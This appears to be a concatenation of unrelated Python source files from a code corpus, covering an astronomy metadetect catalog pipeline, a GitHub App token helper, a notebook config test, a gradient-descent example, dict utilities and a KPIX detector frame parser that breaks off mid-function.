def _make_output_array(
*,
data, slice_id, mdet_step,
orig_start_row, orig_start_col, position_offset, wcs, buffer_size,
central_size, coadd_dims, model, info, output_file, band_names, band_inds,
nepoch_per_band, nepoch_eff_per_band,
):
"""
Add columns to the output data array. These include the slice id, metacal
step (e.g. '1p'), ra, dec in the sheared coordinates as well as unsheared
coordinates
Parameters
----------
data: array with fields
The data, to be augmented
slice_id: int
The slice id
mdet_step: str
e.g. 'noshear', '1p', '1m', '2p', '2m'
orig_start_row: int
Start row of origin of slice
orig_start_col: int
Start col of origin of slice
position_offset: int
Often 1 for wcs
wcs: world coordinate system object
wcs for converting image positions to sky positions
buffer_size: int
The size of the buffer region to cut for each slice.
central_size: int
The size of the central region.
coadd_dims: tuple of ints
The dimension of the full image that the slices tile.
model: str
The model used for metadetect. This is used to rename columns starting
with '{model}_' to 'mdet_'.
info : dict
Dict of tile geom information for getting detections in the tile boundaries.
output_file : str
The output filename.
band_names : list of str
If given, the names of the bands as single strings to use in generating the
output data.
band_inds : list of int
The band fluxes are reordered according to these indices.
nepoch_per_band : list of int
The number of coadded epochs per band.
nepoch_eff_per_band : list of int
The effective number of coadded epochs per band.
Returns
-------
array with new fields
"""
mpre = model + '_'
# get # of bands
name = mpre + "band_flux"
if len(data[name].shape) == 1:
nbands = 1
else:
nbands = data[name].shape[1]
if band_inds is not None:
data = _reorder_band_fluxes(model, data, band_inds)
assert len(band_inds) == nbands, (
"The # of band inds %s doesn't match the number of bands %d." % (
band_inds,
nbands,
)
)
if band_names is not None:
assert len(band_names) == nbands, (
"The # of band names %s doesn't match the number of bands %d." % (
band_inds,
nbands,
)
)
filename = os.path.basename(output_file)
if filename.endswith(".fz"):
filename = filename[:-len(".fz")]
tilename = filename.split('_')[0]
new_dt = _make_output_dtype(
nbands=nbands,
filename_len=len(filename),
tilename_len=len(tilename),
band_names=band_names,
)
arr = np.zeros(data.shape, dtype=new_dt)
for name in arr.dtype.names:
if arr[name].dtype.kind == "f":
arr[name] = np.nan
# fill simple columns
for col in [
"flags",
"psf_flags",
"psf_T",
"ormask",
"mfrac",
"bmask",
"ormask_noshear",
"mfrac_noshear",
"bmask_noshear",
"psfrec_flags",
"psfrec_T",
]:
if col in data.dtype.names:
arr[col] = data[col]
# now fill the model dependent ones
for col in [
"mdet_flags",
"mdet_s2n",
"mdet_T",
"mdet_T_err",
"mdet_T_ratio",
]:
data_col = mpre + col[len("mdet_"):]
if data_col in data.dtype.names:
arr[col] = data[data_col]
# do the shears
if "psf_g" in data.dtype.names:
arr["psf_g_1"] = data["psf_g"][:, 0]
arr["psf_g_2"] = data["psf_g"][:, 1]
if "psfrec_g" in data.dtype.names:
arr["psfrec_g_1"] = data["psfrec_g"][:, 0]
arr["psfrec_g_2"] = data["psfrec_g"][:, 1]
if mpre + "g" in data.dtype.names:
arr["mdet_g_1"] = data[mpre + "g"][:, 0]
arr["mdet_g_2"] = data[mpre + "g"][:, 1]
if mpre + "g_cov" in data.dtype.names:
arr["mdet_g_cov_1_1"] = data[mpre + "g_cov"][:, 0, 0]
arr["mdet_g_cov_1_2"] = data[mpre + "g_cov"][:, 0, 1]
arr["mdet_g_cov_2_2"] = data[mpre + "g_cov"][:, 1, 1]
# fluxes
if mpre + "band_flux_flags" in data.dtype.names:
arr["mdet_flux_flags"] = data[mpre + "band_flux_flags"]
if (
mpre + "band_flux" in data.dtype.names
and mpre + "band_flux_err" in data.dtype.names
):
if band_names is not None:
if nbands == 1:
arr["mdet_%s_flux" % band_names[0]] = data[mpre + "band_flux"][:]
arr["mdet_%s_flux_err" % band_names[0]] \
= data[mpre + "band_flux_err"][:]
else:
for i, b in enumerate(band_names):
arr["mdet_%s_flux" % b] = data[mpre + "band_flux"][:, i]
arr["mdet_%s_flux_err" % b] = data[mpre + "band_flux_err"][:, i]
else:
arr["mdet_flux"] = data[mpre + "band_flux"]
arr["mdet_flux_err"] = data[mpre + "band_flux_err"]
assert len(nepoch_per_band) == nbands, (
"The length of the band nepochs list %s doesn't match the "
"number of bands %d." % (
nepoch_per_band,
nbands,
)
)
assert len(nepoch_eff_per_band) == nbands, (
"The length of the effective band nepochs list %s doesn't match the "
"number of bands %d." % (
nepoch_eff_per_band,
nbands,
)
)
if band_names is not None:
for b, ne in zip(band_names, nepoch_per_band):
arr["nepoch_%s" % b] = ne
for b, ne in zip(band_names, nepoch_eff_per_band):
arr["nepoch_eff_%s" % b] = ne
else:
arr["nepoch"][:] = np.array(nepoch_per_band, dtype="i4")
arr["nepoch_eff"][:] = np.array(nepoch_eff_per_band, dtype="i4")
arr['slice_id'] = slice_id
arr['mdet_step'] = mdet_step
arr['filename'] = filename
arr['tilename'] = tilename
# deal with positions
arr['slice_y_noshear'] = data['sx_row_noshear']
arr['slice_x_noshear'] = data['sx_col_noshear']
arr['slice_y'] = data['sx_row']
arr['slice_x'] = data['sx_col']
# these are in global coadd coords
arr['y'] = orig_start_row + data['sx_row']
arr['x'] = orig_start_col + data['sx_col']
arr['y_noshear'] = orig_start_row + data['sx_row_noshear']
arr['x_noshear'] = orig_start_col + data['sx_col_noshear']
arr['ra'], arr['dec'] = _get_radec(
row=arr['slice_y'],
col=arr['slice_x'],
orig_start_row=orig_start_row,
orig_start_col=orig_start_col,
position_offset=position_offset,
wcs=wcs,
)
arr['hpix_16384'] = hp.ang2pix(
16384, arr['ra'], arr['dec'], nest=True, lonlat=True
)
arr['ra_noshear'], arr['dec_noshear'] = _get_radec(
row=arr['slice_y_noshear'],
col=arr['slice_x_noshear'],
orig_start_row=orig_start_row,
orig_start_col=orig_start_col,
position_offset=position_offset,
wcs=wcs,
)
arr['hpix_16384_noshear'] = hp.ang2pix(
16384, arr['ra_noshear'], arr['dec_noshear'], nest=True, lonlat=True
)
slice_bnds = get_slice_bounds(
orig_start_col=orig_start_col,
orig_start_row=orig_start_row,
central_size=central_size,
buffer_size=buffer_size,
coadd_dims=coadd_dims
)
for tail in ["", "_noshear"]:
msk = (
(arr['slice_y' + tail] >= slice_bnds["min_row"])
& (arr['slice_y' + tail] < slice_bnds["max_row"])
& (arr['slice_x' + tail] >= slice_bnds["min_col"])
& (arr['slice_x' + tail] < slice_bnds["max_col"])
)
arr["mask_flags" + tail][~msk] |= MASK_SLICEDUPE
msk = in_unique_coadd_tile_region(
ra=arr['ra' + tail],
dec=arr['dec' + tail],
crossra0=info['crossra0'],
udecmin=info['udecmin'],
udecmax=info['udecmax'],
uramin=info['uramin'],
uramax=info['uramax'],
)
arr["mask_flags" + tail][~msk] |= MASK_TILEDUPE
msk = (
((arr['bmask' + tail] & BMASK_EXPAND_GAIA_STAR) != 0)
| ((arr['bmask' + tail] & BMASK_GAIA_STAR) != 0)
)
arr["mask_flags" + tail][msk] |= MASK_GAIA_STAR
return arr
def _get_radec(*,
row,
col,
orig_start_row,
orig_start_col,
position_offset,
wcs):
"""
Convert image positions to sky positions
Parameters
----------
row: array
array of rows in slice coordinates
col: array
array of columns in slice coordinates
orig_start_row: float
Start row of origin of slice
orig_start_col: float
Start col of origin of slice
position_offset: int
Always 1 for DES WCS transforms
wcs: world coordinate system object
wcs for converting image positions to sky positions
Returns
-------
ra, dec arrays
"""
trow = np.array(row + orig_start_row + position_offset).astype(np.float64)
tcol = np.array(col + orig_start_col + position_offset).astype(np.float64)
ra, dec = wcs.image2sky(x=tcol, y=trow)
return ra, dec
def _post_process_results(
*, outputs, obj_data_list, image_info, buffer_size, central_size, config, info,
output_file, band_names,
):
# post process results
wcs_cache = {}
obj_data = obj_data_list[0]
output = []
dt = 0
missing_slice_inds = []
missing_slice_flags = []
for res, i, _dt, flags, band_inds in outputs:
dt += _dt
if res is None or res["noshear"] is None or res["noshear"].size == 0:
if res is None:
flags |= MASK_MISSING_MDET_RES
else:
flags |= MASK_MISSING_NOSHEAR_DET
missing_slice_inds.append(i)
missing_slice_flags.append(flags)
continue
for mdet_step, data in res.items():
if data is not None and data.size > 0:
file_id = max(obj_data['file_id'][i, 0], 0)
if file_id in wcs_cache:
wcs, position_offset = wcs_cache[file_id]
else:
wcs = eu.wcsutil.WCS(json.loads(image_info['wcs'][file_id]))
position_offset = image_info['position_offset'][file_id]
wcs_cache[file_id] = (wcs, position_offset)
coadd_dims = (wcs.get_naxis()[0], wcs.get_naxis()[1])
assert coadd_dims == (10000, 10000), (
"Wrong coadd dims %s computed!" % (coadd_dims,)
)
output.append(_make_output_array(
data=data,
slice_id=obj_data['id'][i],
mdet_step=mdet_step,
orig_start_col=obj_data['orig_start_col'][i, 0],
orig_start_row=obj_data['orig_start_row'][i, 0],
wcs=wcs,
position_offset=position_offset,
buffer_size=buffer_size,
central_size=central_size,
coadd_dims=coadd_dims,
model=config['model'],
info=info,
output_file=output_file,
band_names=band_names,
band_inds=band_inds,
nepoch_per_band=[od["nepoch"][i] for od in obj_data_list],
nepoch_eff_per_band=[od["nepoch_eff"][i] for od in obj_data_list],
))
if len(output) > 0:
# concatenate once since generally more efficient
output = np.concatenate(output)
assert len(wcs_cache) == 1
else:
output = None
# default to first slice if we find nothing
i = 0
file_id = max(obj_data['file_id'][i, 0], 0)
wcs = eu.wcsutil.WCS(json.loads(image_info['wcs'][file_id]))
position_offset = image_info['position_offset'][file_id]
coadd_dims = (wcs.get_naxis()[0], wcs.get_naxis()[1])
assert coadd_dims == (10000, 10000), (
"Wrong coadd dims %s computed!" % (coadd_dims,)
)
return (
output, dt, missing_slice_inds, missing_slice_flags, wcs,
position_offset, coadd_dims
)
def _truncate_negative_mfrac_weight(mbobs):
for obslist in mbobs:
for obs in obslist:
with obs.writeable():
msk = obs.mfrac < 0
if np.any(msk):
LOGGER.debug(
"truncating negative mfrac values: min %f",
obs.mfrac[msk].min(),
)
obs.mfrac[msk] = 0
msk = obs.weight < 0
if np.any(msk):
LOGGER.debug(
"truncating negative weight values: min %f",
obs.weight[msk].min(),
)
obs.weight[msk] = 0
def _write_mbobs_image(viz_dir, mbobs, islice, slug):
import proplot as pplt
nrows = sum([1 if len(mbobs[i]) > 0 else 0 for i in range(len(mbobs))])
ncols = 6
cmap = "rocket"
fig, axs = pplt.subplots(
nrows=nrows, ncols=ncols, refaspect=1, span=False,
)
for i in range(nrows):
if len(mbobs[i]) == 0:
continue
obs = mbobs[i][0]
ax = axs[i, 0]
ax.imshow(
np.arcsinh(obs.image * np.sqrt(obs.weight)),
cmap=cmap,
origin='lower',
)
ax.grid(False)
if i == 0:
ax.set_title("image")
ax.set_ylabel("band %d" % i)
ax = axs[i, 1]
ax.imshow(
obs.mfrac,
cmap=cmap,
origin='lower',
vmin=0,
vmax=obs.mfrac.max(),
)
ax.grid(False)
if i == 0:
ax.set_title("mfrac")
ax = axs[i, 2]
ax.imshow(
np.arcsinh(obs.bmask),
cmap=cmap,
origin='lower',
)
ax.grid(False)
if i == 0:
ax.set_title("bmask")
ax = axs[i, 3]
ax.imshow(
np.arcsinh(obs.ormask),
cmap=cmap,
origin='lower',
)
ax.grid(False)
if i == 0:
ax.set_title("ormask")
ax = axs[i, 4]
ax.imshow(
np.arcsinh(obs.noise),
cmap=cmap,
origin='lower',
)
ax.grid(False)
if i == 0:
ax.set_title("noise")
ax = axs[i, 5]
ax.imshow(
np.arcsinh(obs.weight),
cmap=cmap,
origin='lower',
vmin=0,
vmax=obs.weight.max(),
)
ax.grid(False)
if i == 0:
ax.set_title("weight")
fname = os.path.join(viz_dir, "mbobs%d%s.png" % (islice, slug))
os.makedirs(os.path.dirname(fname), exist_ok=True)
fig.savefig(fname)
def _preprocess_for_metadetect(preconfig, mbobs, gaia_stars, i, rng):
LOGGER.debug("preprocessing entry %d", i)
_truncate_negative_mfrac_weight(mbobs)
if gaia_stars is not None:
LOGGER.debug("masking GAIA stars")
mask_gaia_stars(mbobs, gaia_stars, preconfig['gaia_star_masks'], rng)
if preconfig is None:
return mbobs
else:
if "slice_apodization" in preconfig:
apply_apodization_corrections(
mbobs=mbobs,
ap_rad=preconfig["slice_apodization"]["ap_rad"],
mask_bit_val=BMASK_SLICE_APODIZED,
)
return mbobs
def _do_metadetect(config, mbobs, gaia_stars, seed, i, preconfig, shear_bands, viz_dir):
_t0 = time.time()
res = None
flags = 0
bandinds = []
nonshear_bandinds = []
if mbobs is not None:
if viz_dir is not None:
_write_mbobs_image(viz_dir, mbobs, i, "_raw")
rng = np.random.RandomState(seed=seed)
minnum = min([len(olist) for olist in mbobs])
if minnum > 0:
LOGGER.debug("preprocessing entry %d", i)
mbobs = _preprocess_for_metadetect(preconfig, mbobs, gaia_stars, i, rng)
if viz_dir is not None:
_write_mbobs_image(viz_dir, mbobs, i, "_preproc")
minnum = min([len(olist) for olist in mbobs])
if minnum > 0:
LOGGER.debug("running mdet for entry %d", i)
shear_mbobs = ngmix.MultiBandObsList()
nonshear_mbobs = ngmix.MultiBandObsList()
for iband, (obslist, is_shear_band) in enumerate(
zip(mbobs, shear_bands)
):
if is_shear_band:
shear_mbobs.append(obslist)
bandinds.append(iband)
else:
nonshear_mbobs.append(obslist)
nonshear_bandinds.append(iband)
if len(nonshear_mbobs) == 0:
nonshear_mbobs = None
try:
res = do_metadetect(
config,
shear_mbobs,
rng,
nonshear_mbobs=nonshear_mbobs,
)
except Exception as e:
LOGGER.debug("metadetect failed for slice %d: %s", i, repr(e))
flags |= MASK_MDET_FAILED
else:
LOGGER.debug(
"mbobs has no data for entry %d in one or more "
"bands after pre-processing: %s",
i,
[len(olist) for olist in mbobs],
)
flags |= MASK_MISSING_BAND_PREPROC
else:
LOGGER.debug(
"mbobs has no data for entry %d in one or more bands: %s",
i,
[len(olist) for olist in mbobs],
)
flags |= MASK_MISSING_BAND
else:
LOGGER.debug("mbobs is None for entry %d", i)
flags |= MASK_NOSLICE
return res, i, time.time() - _t0, flags, bandinds + nonshear_bandinds
def get_part_ranges(part, n_parts, size):
"""Divide a list of things of length `size` into `n_parts` and
retrurn the range for the given `part`.
Parameters
----------
part : int
The 1-indexed part.
n_parts : int
The total number of parts.
size : int
The length of the list of items to split into `n_parts`.
Returns
-------
start : int
The starting location.
num : int
The number of items in the part.
"""
n_per = size // n_parts
n_extra = size - n_per * n_parts
n_per = np.ones(n_parts, dtype=np.int64) * n_per
if n_extra > 0:
n_per[:n_extra] += 1
stop = np.cumsum(n_per)
start = stop - n_per
return start[part-1], n_per[part-1]
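# Worked example: get_part_ranges(part=2, n_parts=3, size=10) returns (4, 3).
# The ten items split as [4, 3, 3], so part 2 starts at index 4 and covers 3 items.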
def _make_meds_iterator(mbmeds, start, num):
"""This function returns a function which is used as an iterator.
Closure closure blah blah blah.
TLDR: Doing things this way allows the code to only read a subset of the
images from disk in a pipelined manner.
This works because all of the list-like things fed to joblib are actually
generators that build their values on-the-fly.
"""
def _func():
for i in range(start, start+num):
mbobs = mbmeds.get_mbobs(i)
LOGGER.debug("read meds entry %d", i)
yield i, mbobs
return _func
def _load_gaia_stars(mbmeds, preconfig):
if 'gaia_star_masks' in preconfig:
gaia_config = preconfig['gaia_star_masks']
gaia_stars = load_gaia_stars(
mbmeds=mbmeds,
poly_coeffs=gaia_config['poly_coeffs'],
max_g_mag=gaia_config['max_g_mag'],
)
print("loaded GAIA star masks", flush=True)
else:
gaia_stars = None
return gaia_stars
def run_metadetect(
*,
config,
multiband_meds,
output_file,
mask_output_file,
seed,
preconfig,
start=0,
num=None,
n_jobs=1,
shear_bands=None,
verbose=100,
viz_dir=None,
band_names=None,
):
"""Run metadetect on a "pizza slice" MEDS file and write the outputs to
disk.
Parameters
----------
config : dict
The metadetect configuration file.
multiband_meds : `ngmix.medsreaders.MultiBandNGMixMEDS`
A multiband MEDS data structure.
output_file : str
The file to which to write the outputs.
mask_output_file : str
The file to write the healsparse mask to.
seed: int
Base seed for generating seeds
preconfig : dict
Preprocessing configuration. May contain a gaia_star_masks
entry.
start : int, optional
The first entry of the file to process. Defaults to zero.
num : int, optional
The number of entries of the file to process, starting at `start`.
The default of `None` will process all entries in the file.
n_jobs : int, optional
The number of jobs to use.
shear_bands : list of bool or None, optional
If not None, this is a list of boolean values indicating if a given
band is to be used for shear. The length must match the number of MEDS
files used to make the `multiband_meds`.
verbose : int, optional
joblib logging level.
viz_dir : str, optional
If not None, write images of the slices to the given location.
band_names : list of str, optional
If given, the names of the bands as single strings to use in generating the
output data.
"""
t0 = time.time()
# process each slice in a pipeline
if num is None:
num = multiband_meds.size
if num + start > multiband_meds.size:
num = multiband_meds.size - start
if shear_bands is None:
shear_bands = [True] * len(multiband_meds.mlist)
if not any(shear_bands):
raise RuntimeError(
"You must have at least one band marked to be "
"used for shear in `shear_bands`!"
)
print('# of slices: %d' % num, flush=True)
print('slice range: [%d, %d)' % (start, start+num), flush=True)
meds_iter = _make_meds_iterator(multiband_meds, start, num)
gaia_stars = _load_gaia_stars(mbmeds=multiband_meds, preconfig=preconfig)
if n_jobs == 1:
outputs = [
_do_metadetect(
config, mbobs, gaia_stars, seed+i*256, i,
preconfig, shear_bands, viz_dir
)
for i, mbobs in PBar(meds_iter(), total=num)]
else:
outputs = joblib.Parallel(
verbose=verbose,
n_jobs=n_jobs,
pre_dispatch='2*n_jobs',
max_nbytes=None, # never memmap
)(
joblib.delayed(_do_metadetect)(
config, mbobs, gaia_stars, seed+i*256, i,
preconfig, shear_bands, viz_dir,
)
for i, mbobs in meds_iter()
)
# join all the outputs
meta = multiband_meds.mlist[0].get_meta()
if 'tile_info' in meta.dtype.names:
info = json.loads(meta["tile_info"][0])
else:
try:
info = json.loads(
multiband_meds.mlist[0]._fits['tile_info'].read().tobytes()
)
except Exception:
print(
"WARNING: tile info not found! attempting to read from the database!",
flush=True,
)
tilename = json.loads(
multiband_meds.mlist[0].get_image_info()['wcs'][0]
)['desfname'].split("_")[0]
info = get_coaddtile_geom(tilename)
pz_config = yaml.safe_load(meta['config'][0])
(
output, cpu_time, missing_slice_inds, missing_slice_flags,
wcs, position_offset, coadd_dims
) = _post_process_results(
outputs=outputs,
obj_data_list=[mle.get_cat() for mle in multiband_meds.mlist],
image_info=multiband_meds.mlist[0].get_image_info(),
buffer_size=int(pz_config['coadd']['buffer_size']),
central_size=int(pz_config['coadd']['central_size']),
config=config,
info=info,
output_file=output_file,
band_names=band_names,
)
# make the masks
msk_img, hs_msk = make_mask(
preconfig=preconfig,
gaia_stars=gaia_stars,
missing_slice_inds=missing_slice_inds,
missing_slice_flags=missing_slice_flags,
obj_data=multiband_meds.mlist[0].get_cat(),
buffer_size=int(pz_config['coadd']['buffer_size']),
central_size=int(pz_config['coadd']['central_size']),
wcs=wcs,
position_offset=position_offset,
coadd_dims=coadd_dims,
info=info,
)
# report and do i/o
wall_time = time.time() - t0
print(
"run time:",
str(datetime.timedelta(seconds=int(wall_time))),
flush=True,
)
print(
"CPU time:",
str(datetime.timedelta(seconds=int(cpu_time))),
flush=True,
)
print(
"CPU seconds per slice:",
cpu_time / num,
flush=True,
)
if output is not None:
with fitsio.FITS(output_file[:-len(".fz")], "rw", clobber=True) as fits:
fits.write(output, extname="cat")
fits.create_image_hdu(
img=None,
dtype="i4",
dims=msk_img.shape,
extname="msk",
header=pz_config["fpack_pars"])
fits["msk"].write_keys(pz_config["fpack_pars"], clean=False)
fits["msk"].write(msk_img)
# fpack it
try:
os.remove(output_file)
except FileNotFoundError:
pass
cmd = 'fpack %s' % output_file[:-len(".fz")]
print("fpack cmd:", cmd, flush=True)
try:
subprocess.check_call(cmd, shell=True)
except Exception:
pass
else:
try:
os.remove(output_file[:-len(".fz")])
except Exception:
pass
hs_msk.write(mask_output_file, clobber=True)
else:
print("WARNING: no output produced by metadetect!", flush=True)
|
the-stack_106_30613 | import jwt
import aiohttp
from datetime import datetime, timedelta, timezone
from jwt.utils import get_int_from_datetime
from auth import GITHUB_PEM_FILE, GITHUB_APP_ID
instance = jwt.JWT()
def new_jwt():
"""Generate a new JSON Web Token signed by RSA private key."""
with open(GITHUB_PEM_FILE, 'rb') as fp:
signing_key = jwt.jwk_from_pem(fp.read())
payload = {
'iat': get_int_from_datetime(datetime.now()),
'exp': get_int_from_datetime(datetime.now(timezone.utc) + timedelta(minutes=10)),
'iss': GITHUB_APP_ID
}
compact_jws = instance.encode(payload, signing_key, alg='RS256')
return compact_jws
async def new_token(_jwt):
authorization = f"Bearer {_jwt}"
headers = {
"Authorization": authorization,
"Accept": "application/vnd.github.v3+json"
}
url = f"https://api.github.com/app/installations/{GITHUB_APP_ID}/access_tokens"
print(url)
async with aiohttp.ClientSession() as session:
async with session.post(url, headers=headers) as resp:
print(resp.status)
token = await resp.read()
return token
async def get_installation(_jwt):
authorization = f"Bearer {_jwt}"
headers = {
"Authorization": authorization,
"Accept": "application/vnd.github.v3+json"
}
url = f"https://api.github.com/app/installations/{GITHUB_APP_ID}"
print(url)
async with aiohttp.ClientSession() as session:
async with session.get(url, headers=headers) as resp:
print(resp.status)
print(await resp.read())
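# Hypothetical usage sketch (not part of the original module; assumes an asyncio entry
# point and that auth.py provides GITHUB_PEM_FILE / GITHUB_APP_ID as imported above):
#
#   import asyncio
#   compact_jws = new_jwt()
#   token_payload = asyncio.run(new_token(compact_jws))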
|
the-stack_106_30617 | import json
import os
import shutil
import tempfile
from notebook.config_manager import BaseJSONConfigManager
def test_json():
tmpdir = tempfile.mkdtemp()
try:
with open(os.path.join(tmpdir, 'foo.json'), 'w') as f:
json.dump(dict(a=1), f)
# also make a foo.d/ directory with multiple json files
os.makedirs(os.path.join(tmpdir, 'foo.d'))
with open(os.path.join(tmpdir, 'foo.d', 'a.json'), 'w') as f:
json.dump(dict(a=2, b=1), f)
with open(os.path.join(tmpdir, 'foo.d', 'b.json'), 'w') as f:
json.dump(dict(a=3, b=2, c=3), f)
manager = BaseJSONConfigManager(config_dir=tmpdir, read_directory=False)
data = manager.get('foo')
assert 'a' in data
assert 'b' not in data
assert 'c' not in data
assert data['a'] == 1
manager = BaseJSONConfigManager(config_dir=tmpdir, read_directory=True)
data = manager.get('foo')
assert 'a' in data
assert 'b' in data
assert 'c' in data
# files should be read in order foo.d/a.json foo.d/b.json foo.json
assert data['a'] == 1
assert data['b'] == 2
assert data['c'] == 3
finally:
shutil.rmtree(tmpdir)
|
the-stack_106_30620 | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 20 10:17:03 2017
@author: fella
"""
from numpy import genfromtxt, array
def compute_error_for_given_points(b,m,points):
totalError = 0
for i in range(0, len(points)):
x = points[i,0]
y = points[i,1]
totalError += (y - (m * x + b)) **2
return totalError/ float(len(points))
def step_gradient(b_current, m_current, points, learning_rate):
#gradient descent
b_gradient = 0
m_gradient = 0
# b_current = new_b
# m_current = new_m
N = float(len(points))
for i in range(0, len(points)):
x = points[i,0]
y = points[i,1]
b_gradient += -(2/N) * (y - (m_current * x + b_current ))
m_gradient += -(2/N) * x * (y - (m_current * x + b_current ))
new_b = b_current - (learning_rate * b_gradient)
new_m = m_current - (learning_rate * m_gradient)
return [new_b, new_m]
def gradient_descent_runner(points, initial_b, initial_m, learning_rate,num_iterations):
b = initial_b
m = initial_m
for i in range(num_iterations):
b,m = step_gradient(b,m,array(points), learning_rate)
return [b, m]
def run():
points = genfromtxt(r'C:\Users\fella\Desktop\Documents\5. Python\Tutorials\linear_regression_live\data.csv', delimiter=',' )
#hyperparameters
learning_rate = 0.0001
#y = mx + b (slope formula)
initial_b = 0
initial_m = 0
num_iterations = 1000
[b,m] = gradient_descent_runner(points, initial_b, initial_m, learning_rate,num_iterations)
print(b)
print(m)
if __name__ == '__main__':
run()
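# Hypothetical quick check on synthetic data (not part of the original script): points
# on the line y = 2x + 1 should drive m toward 2 and b toward 1.
#
#   pts = array([[x, 2 * x + 1] for x in range(10)], dtype=float)
#   b, m = gradient_descent_runner(pts, 0, 0, 0.01, 10000)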
|
the-stack_106_30621 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
"""
Collection utilities.
"""
from typing import Any
from collections import UserDict
class FancyDict(dict):
def __getattr__(self, key: str) -> Any:
try:
return self[key]
except KeyError as k:
raise AttributeError(k)
def __setattr__(self, key: str, value: Any):
# Dunder (built-in) attributes are set on the instance rather than stored as dict keys
if key.startswith("__") and key.endswith("__"):
super().__setattr__(key, value)
else:
self[key] = value
def __delattr__(self, key: str):
try:
del self[key]
except KeyError as k:
raise AttributeError(k)
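# Usage example for FancyDict (attribute-style access backed by the dict itself):
#
#   d = FancyDict(key="value")
#   d.other = 1                 # stored as d["other"]
#   assert d.key == "value" and d["other"] == 1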
class ConstantDict(dict):
"""ConstantDict is a subclass of :class:`dict`, implementing __setitem__
method to avoid item assignment::
>>> d = ConstantDict({'key': 'value'})
>>> d['key'] = 'value'
Traceback (most recent call last):
...
TypeError: 'ConstantDict' object does not support item assignment
"""
def __setitem__(self, key: str, value: Any):
raise TypeError(
"'%s' object does not support item assignment" % self.__class__.__name__
)
|
the-stack_106_30622 | import rogue
import pyrogue
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
from collections import defaultdict
from collections import Counter
import ctypes
#import line_profiler
import pprint
pp = pprint.PrettyPrinter(indent=2)
nesteddict = lambda:defaultdict(nesteddict)
c_uint = ctypes.c_uint
class KpixSampleRaw(ctypes.LittleEndianStructure):
_fields_ = [
('row', c_uint, 5), #4:0
('col', c_uint, 5), #9:5
('bucket', c_uint, 2), #11:10
('triggerFlag', c_uint, 1), #12
('rangeFlag', c_uint, 1), #13
('badCountFlag', c_uint, 1), #14
('emptyFlag', c_uint, 1), #15
('kpixId', c_uint, 12), #27:16
('type', c_uint, 4), #31:28
('adc', c_uint, 13), #44:32
('dmy2', c_uint, 3), #47:45
('timestamp', c_uint, 13), #60:48
]
_pack_ = 1
class KpixSample(ctypes.Union):
_anonymous_ = ('fields',)
_fields_ = [
('fields', KpixSampleRaw),
('asWord', ctypes.c_uint64),]
def __init__(self, word):
self.asWord = word
def toInt(ba):
return int.from_bytes(ba, 'little')
def getField(value, highBit, lowBit):
mask = 2**(highBit-lowBit+1)-1
return (value >> lowBit) & mask
def parseSample(ba, timestamp):
#baSwapped = np.array([ba[4], ba[5], ba[6], ba[7], ba[0], ba[1], ba[2], ba[3]])
value = int.from_bytes(ba, 'little', signed=False)
d = {}
d['type'] = getField(value, 31, 28)
d['kpixId'] = getField(value, 27, 16)
if d['type'] == 3:
d['firstRuntime'] = getField(value, 63, 32)
elif d['type'] == 1:
d['temperature'] = getField(value, 39, 32)
d['count'] = getField(value, 63, 56)
elif d['type'] == 2:
d['acquisitionTime'] = getField(value, 63, 32)
d['bunchCount'] = getField(value, 15, 3)
d['subCount'] = getField(value, 2, 0)
d['absoluteTime'] = ((d['acquisitionTime']+timestamp))
else:
d['row'] = getField(value, 4, 0)
d['col'] = getField(value, 9, 5)
d['bucket'] = getField(value, 11, 10)
d['triggerFlag'] = getField(value, 12, 12)
d['rangeFlag'] = getField(value, 13, 13)
d['badCountFlag'] = getField(value, 14, 14)
d['emptyFlag'] = getField(value, 15, 15)
d['adc'] = getField(value, 44, 32)
d['timestamp'] = getField(value, 60, 48)
return d
#@profile
def parseFrame(ba):
frameSizeBytes = len(ba)
numSamples = int((frameSizeBytes-32-4)/8)
timestamp = int.from_bytes(ba[4:12], 'little')
eventNumber = int.from_bytes(ba[0:4], 'little')
d = {}
d['runtime'] = timestamp
d['eventNumber'] = eventNumber
d['samples'] = nesteddict()
kpixCounter = Counter()
print(f'Parsing frame {eventNumber}, timestamp: {timestamp}, {numSamples} samples')
rawSamples = ba[32:-4]
data = (rawSamples[i:i+8] for i in range(0, len(rawSamples), 8))
runtimes = []
timestampCount = 0
for raw in data:
sample = parseSample(raw, timestamp)
if sample['type'] == 2:
print(sample)
timestampCount += 1
if sample['type'] == 3:
print(f"Found runtime sample: {sample['kpixId']} {sample['firstRuntime']:#08x} diff: {sample['firstRuntime']-(timestamp&0xFFFFFFFF)}")
if sample['type'] == 0:
kpixCounter[sample['kpixId']] += 1
print(f'Got {timestampCount} timestamps')
print(kpixCounter)
return d
# if sample['kpixId'] == 24:
# print(f'Found local kpix sample: {sample}')
# elif sample['type'] == 3:
#print(f"Found runtime sample: {sample['kpixId']} {sample['firstRuntime']:#08x} diff: {sample['firstRuntime']-(timestamp&0xFFFFFFFF)}")
# if sample['kpixId'] != 24:
# runtimes.append(sample)
# else:
# pass
#d['samples'][sample['kpixId']][sample['bucket']][sample['row']][sample['col']] = sample['adc']
#print(f'Normal sample: {sample}')
#print(f'All Runtimes: {runtimes}')
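# NOTE: the early `return d` above exits before the runtime-consistency check below,
# so the following block is currently unreachable.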
s = set((x['firstRuntime']-d['runtime'] for x in runtimes))
#print(f'Runtimes: {s}')
if len(s) != 1:
print('-----')
print("Runtimes do not match!")
for r in runtimes:
print(r)
print('-----')
return d
class KpixStreamInfo(rogue.interfaces.stream.Slave):
def __init__(self, ):
rogue.interfaces.stream.Slave.__init__(self)
def _acceptFrame(self, frame):
if frame.getError():
print('Frame Error!')
return
ba = bytearray(frame.getPayload())
frame.read(ba, 0)
print(f'Got Frame on channel {frame.getChannel()}: {len(ba)} bytes')
if frame.getChannel() == 0:
d = parseFrame(ba)
print(d)
# for k, kpix in d['samples'].items():
# print(k)
# if k == 24: continue
# print(f'Kpix: {k}')
# for b, bucket in kpix.items():
# print(f'Bucket: {b}')
# for r, row in bucket.items():
# l = []
# for c in range(32):
# if c not in row:
